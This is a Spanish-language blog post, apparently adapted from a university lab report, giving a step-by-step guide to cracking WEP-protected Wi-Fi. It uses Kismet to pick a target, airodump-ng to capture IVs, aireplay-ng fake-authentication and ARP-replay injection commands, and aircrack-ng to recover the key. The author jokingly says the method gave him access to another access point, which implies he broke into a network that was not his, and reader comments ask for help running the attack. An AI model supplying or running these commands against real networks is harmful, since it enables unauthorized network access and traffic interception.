Rompiendo una clave WEP

DIA 1:

Hola nuevamente, pues esta fue una practica que desarrollamos durante el curso de Redes1 en la U. La verdad que me parecio todo perfecto excepto por la desafortunada incompatibilidad de hardware que suelo tener a menudo. Aunque gracias a eso he aprendido bastante sobre drivers en linux.

Para romper una clave WEP no necesitas usar linux pero yo si te lo recomiendo. En mi caso utilice una distro llamada backtrack la cual se especializa en seguridad de redes y trae un resto de aplicaciones dedicadas exclusivamente al tema.

He realizado un mini-howto (realmente fue el manual de usuario que entregue para la practica) pero desafortunadamente ya no cuento con la tarjeta inalambrica que utilice esa vez y ahora tengo una broadcom. El problema es que la version que habia usado de backtrack no tiene compatiblidad con ese chip. Recien acabo de bajar una version actualizada y que corre en USB (1 gb), les mantendre informados sobre esto.

DIA 2:

He decidido probar primero con otra tarjeta, ya que me estaba desesperando en buscar e instalar algun parche para mi tarjeta broadcom. Esta vez lo estoy intentando con una TrendNet que tiene un chip Atheros y de momento todo ha ido bien.

(horas mas tarde…)

No voy a entrar a temas morales, pero el asunto es que ahora ya tengo un punto de acceso mas al cual conectarme jeje🙂

Hice un mini-howto, no esta nada completo pero ha funcionado ya con 2 access point diferentes. Espero que les sirva.


CRACKEANDO UNA CLAVE WEP
El objetivo de este manual es mostrar paso a paso como crackear una red inalámbrica protegida por clave WEP.
Luego de varias horas de producir bilis porque el bendito GUINDOS no tiene drivers compatibles para mi tarjeta de red inalámbrica (Broadcom) me decidí a aventurarme en el maravilloso software libre. Me conseguí una distribución Linux de nombre BACKTRACK (esta distribución posee una infinidad de herramientas para probar la seguridad de las redes Ethernet y wifi). No es necesario conseguir BACKTRACK para hackear la clave WEP, pero si los siguientes programas:
– Kismet
– Airodump-ng
– Aireplay-ng
– AirCrack-ng
Además de eso necesitamos tiempo disponible y mucha paciencia patojos🙂

-=| PASO 0 |=_
Antes de empezar es necesario recabar cierta información, una muy importante es la dirección física (MAC) de nuestra tarjeta de red inalámbrica, para esto abrimos la consola
(Alt + F2) >> Konsole

dibujo1

y tecleamos ‘ifconfig’ nos mostrara una pantalla como la que sigue:

mostrando informacion sobre nuestra tarjeta

Una hoja a la mano o buena memoria para apuntar la dirección, en mi caso es 00:14:A5:DA:EF:52

-=| PASO 1 |=_
Bueno la idea es la siguiente: primero vamos a detectar que red vamos a atacar, para esto vamos a utilizar la herramienta Kismet, y si no quiero usar Kismet que pasa? bueno pues entonces a conseguir otra herramienta que nos detecte las redes disponibles pero en especifico que nos diga la MAC del Access Point que queremos atacar, el canal en el que transmite y si la red esta cifrada o no. Entonces damos clic al inicio >> Backtrack >> Radio Network Analysis >> 80211 >> Analyser >> Kismet, nos mostrara un cuadro con las redes inalámbricas al alcance, hay varios campos que se muestran.
Presionamos la tecla ‘s’ (minúscula) y nos aparece un listado de posibles opciones, seleccionamos la letra ‘b’ ahora con las flechas nos movemos para obtener mas información de la red que deseamos atacar y presionamos Enter. En este caso será la red llamada: ‘gmg’. De los datos que nos muestra únicamente nos interesa saber la dirección física (MAC), el canal en el que transmite y si la red está cifrada (WEP, las redes cifradas WEP se muestran con un color de texto verde).

pantalla de kismet

Estos son los datos que necesitamos:
00:13:46:A1:B6:0C -> dirección física del Access Point que transmite nuestra red llamada ‘gmg’.
canal 2 -> El canal en el que transmite la red ‘default’
WEP -> El tipo de cifrado.
Ahora cerramos Kismet presionando la tecla ‘Q’ (mayúscula) 2 veces.
NOTA: Tenemos que cerrar Kismet antes de continuar con el paso 2.

-=| PASO 2 |=_
Lo que sigue es empezar a capturar paquetes de la red que deseamos atacar, para eso vamos a utilizar la herramienta Airodump-ng con algunos parámetros:
El Airodump-ng es una herramienta que se usa para capturar paquetes wireless 802.11 y va acumulando vectores de inicialización IVs con el fin de usarlos con aircrack-ng y obtener la clave WEP.
Para usar el Airodump-ng se usa con diferentes parámetros, los cuales la sintaxis es:
airodump-ng <opciones> <interface> [,<interface>,…]
Opciones:
–ivs: Graba únicamente los IVs capturados
–gpsd: Usa GPSd
–w <nombre archivo>: Nombre del archivo donde guardar las capturas
-write: Lo mismo que –w
–beacons: Guardar todas las balizas o beacons en el archivo
–netmask <máscara de red> : Filtrar APs por máscara
–bssid <bssid> : Filtrar APs por BSSID

Interface:
–channel <canal>: Capturar en un canal específico
–band <abg>: Banda en la que actuará airodump-ng
–cswitch <método>: Saltar de canal con este método:
0 : FIFO (opción por defecto)
1 : Round Robin
2 : Saltar al último
-s: Lo mismo que –cswitch

Vamos a ver una ventana como la siguiente

pantalla de airodump

Las columnas a las que tenemos que prestar suma atención son las de RXQ y #Data, RXQ es la calidad de la señal máx. 100 y min 0, debemos tratar de tener una buena señal, de lo contrario la recepción de los paquetes tomara muchísimo mas tiempo. El #Data nos indica la cantidad de marcos IV’s que hemos recibido exitosamente, un min de 150,000 y un máx. de 250,000 dependiendo la longitud de la clave WEP cifrada.
-=| PASO 3 |=_
En este paso lo que tratamos de hacer es acelerar la recepción de paquetes con marcos IV’s validos, para eso usamos la aplicación AIREPLAY-NG con algunos parámetros como los siguientes:

Aireplary-ng se usa para inyectar paquetes. La función principal es generar trafico para poder usarlo después con aircrack-ng y porder crackear claves WEP.
Para usar la herramienta de Aireplay-ng se usa con diferentes parámetros, la sintaxis de esto es la siguiente:

aireplay-ng <opciones> <interface>
Opciones de filtro:
-b bssid : Dirección MAC del punto de acceso
-d dmac : Dirección MAC de destino
-s smac : Dirección MAC origen (source)
-m len : Longitud mínima del paquete
-n len : Longitud máxima del paquete
-u type : frame control, type field
-v subt : frame control, subtype field
-t tods : frame control, To DS bit
-f fromds : frame control, From DS bit
-w iswep : frame control, WEP bit
Opciones de inyeción:
-x nbpps : número de paquetes por segundo
-p fctrl : fijar palabra “frame control” (hexadecimal)
-a bssid : fijar dirección MAC del AP
-c dmac : fijar dirección MAC de destino
-h smac : fijar dirección MAC origen
-e essid : ataque de falsa autenticación: nombre del AP
-j : ataque arp-replay: inyectar paquetes FromDS
-g valor : cambiar tamaño de buffer (default: 8)
-k IP : fijar IP de destino en fragmentos
-l IP : fijar IP de origen en fragmentos
-o npckts : número de paquetes por burst (-1)
-q sec : segundos entre paquetes “sigo aquí” o keep-alives (-1)
-y prga : keystream para autenticación compartida (shared key)
Opciones de origen:
-i iface : capturar paquetes con esa interface
-r archivo : utilizar paquetes de ese archivo cap
Modos de ataque (Los números también se pueden seguir usando como en versiones anteriores):
-deauth [número]: deautenticar 1 o todos los clientes (-0)
-fakeauth [nº repetición]: falsa autenticación con el AP (-1)
-interactive : selección interactiva del paquete a enviar (-2)
-arpreplay : estandard reinyección ARP-request (-3)
-chopchop : desencriptar paquete WEP/chopchop (-4)
-fragment : generar keystream válido (-5)

Nos autenticamos primero con:
aireplay-ng -1 0 -e SSID -a BSSID -h MI_MAC eth1
luego mandamos
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 00:15:E9:F7:1C:91 -h 00:14:A5:DA:EF:52 eth1

Otra forma:
aireplay-ng -x 512 -b 00:15:E9:F7:1C:91 -h 00:14:A5:DA:EF:52 –arpreplay eth1

aireplay-ng -2 -p 0841 -b 00:15:E9:F7:1C:91 -h 00:14:A5:DA:EF:52 -r replay_arp-1022-112400.cap eth1

inyectando paquetes interactivamente

Hay varios tipos de ataque para poder obtener estos preciados marcos, y en este manual no se detallan pero se encuentran disponibles en la página oficial de AIROPLAY-NG.

-=| PASO 4 |=_
Es tiempo de desencriptar nuestra clave WEP (solo si hemos capturado la cantidad necesaria de paquetes). Para esto utilizamos la herramienta llamada aircrack-ng.
Aircrack-ng es un programa crackeador de claves 802.11 WEP y WPA/WPA2-PSK. Aircrack-ng puede recuperar la clave WEP una vez que se han capturado suficientes paquetes encriptados con airodump-ng. Este programa de la suite aircrack-ng lleva a cabo varios tipos de ataques para descubrir la clave WEP con pequeñas cantidades de paquetes capturados, combinando ataques estadísticos con ataques de fuerza bruta. Para crackear claves WPA/WPA2-PSK, es necesario usar un diccionario.
Para utilizar esta herramienta, esta es la sintaxis:
aircrack-ng [opciones] <archivo(s) de captura>

Utilizando esta herramienta nos da la siguiente pantalla en donde nos muestra la clave WEP.

obteniendo la clave wep

aircrack-ng *.cap –n 64 –m MAC_AP

puede funcionar tambien para obtener mas rapidamente la clave si sabemos que es de 64 bits

3 comentarios el “Rompiendo una clave WEP

  1. Ahi te cuento si me funciona, solo que hay que bajar las iso, y que dolor porque la conexion del ciberdonde ando esta a 12 k jeje!! ahi te cuento que pasiones!!

  2. CARLOS dice:

    gracias por eltuto

  3. manolo dice:

    pues yo no puedo sacar mi clave yo uso windows pero baje unos programas para capturar paquetes que es CommView for WiFi y los guardo con extension cap ya luego los abro en aircrack-ng y no sale nada solo index number of target network.si me pudieran ayudar se los agradeceria

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s